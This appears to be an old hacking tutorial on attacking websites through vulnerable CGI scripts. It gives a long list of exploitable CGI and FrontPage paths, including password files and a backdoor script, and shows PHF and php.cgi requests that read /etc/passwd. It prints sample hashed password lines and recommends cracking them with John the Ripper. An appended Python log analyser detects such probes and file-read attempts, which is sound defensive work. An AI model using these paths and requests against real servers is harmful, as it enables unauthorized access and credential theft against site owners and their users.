Hacking websites with CGI vulnerabilities
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML script > /cgi-bin/htmlscript
HTIMAGE > /cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
Method 2:
Instead of searching manually, we can use a CGI scanner to make the job easier. Note: if you find one of these CGIs on the site you are checking, you also need to find the exploit that works against it. Now let's say we found the PHF vulnerability using one of the two methods. We use it by entering: http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
The file that comes back will of course be the password file in etc, the one holding the usernames and passwords. It looks like this:
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/slasher:/bin/bash
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/home/mcgreen:/bin/bash
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],,:/home/abi98:/bin/bash
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henner_:/bin/bash
You can crack the resulting passwords with a password cracker (John The Ripper is recommended). What do we do if the page we want to hack, checked manually or with the help of a program, has service.pwd? We enter: http://www.domain.com/_vti_pvt/services.pwd
Here is a PHP CGI example as well: http://www.domain.com/cgi-bin/php.c..../../etc/passwd
Looking at these examples should give you at least some grasp of the logic. Once you have found the bug, you need to find or write its exploit and run it.
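Seen from the defending side, both the scanner sweep and the individual requests described above leave a clear trail in the web server's access log. The following is an added example, not part of the original post: it flags requests for a subset of the listed paths, raises severity when the server answered with a 2xx status, and reports clients that probe several distinct paths. The function names, log lines, IP addresses and placeholder query string are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Subset of the legacy paths listed on this page, lower-cased for matching.
LEGACY_PATHS = {
    "/cgi-bin/phf", "/cgi-bin/php.cgi", "/cgi-bin/test-cgi", "/cgi-bin/count.cgi",
    "/_vti_inf.html", "/_vti_pvt/service.pwd", "/_vti_pvt/users.pwd",
    "/_vti_pvt/authors.pwd", "/_vti_pvt/administrators.pwd",
}
# Markers of a file-read attempt in the decoded request target.
SENSITIVE = re.compile(r"/etc/passwd|\.\./", re.I)
# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+')

def normalise(target):
    """Decode %xx twice (double encoding), drop the query, collapse //, lower-case."""
    decoded = unquote(unquote(target))
    path = re.split(r"[?#]", decoded, maxsplit=1)[0]
    return re.sub(r"/{2,}", "/", path).lower(), decoded

def analyse(lines, scan_threshold=3):
    """Return (alerts, scanners) for an iterable of access-log lines."""
    alerts, probed = [], defaultdict(set)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        path, decoded = normalise(target)
        if path not in LEGACY_PATHS:
            continue
        probed[ip].add(path)
        if status.startswith("2"):  # the server actually served the script or file
            sev = "critical" if SENSITIVE.search(decoded) else "high"
            alerts.append((sev, ip, path, int(status)))
    # Many distinct legacy paths from one client is the signature of a CGI scanner.
    scanners = sorted(ip for ip, p in probed.items() if len(p) >= scan_threshold)
    return alerts, scanners

# Constructed sample lines: documentation IP ranges, placeholder query string.
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2024:13:55:01 +0000] "GET /cgi-bin/phf HTTP/1.0" 404 209',
    '203.0.113.7 - - [10/Oct/2024:13:55:01 +0000] "GET /cgi-bin/test-cgi HTTP/1.0" 404 209',
    '203.0.113.7 - - [10/Oct/2024:13:55:02 +0000] "GET /_vti_pvt/service.pwd HTTP/1.0" 404 209',
    '198.51.100.9 - - [10/Oct/2024:14:02:11 +0000] "GET /cgi-bin/phf?q=PLACEHOLDER%20/etc/passwd HTTP/1.0" 200 512',
    '198.51.100.9 - - [10/Oct/2024:14:03:40 +0000] "GET //_VTI_PVT/service%2Epwd HTTP/1.0" 200 87',
    '192.0.2.44 - - [10/Oct/2024:14:05:00 +0000] "GET /index.html HTTP/1.1" 200 1043',
]
```

Calling `analyse(SAMPLE)` returns the per-request alerts and the list of scanning clients; any 2xx answer on one of these paths means the script or password file is still deployed and should be removed from the server.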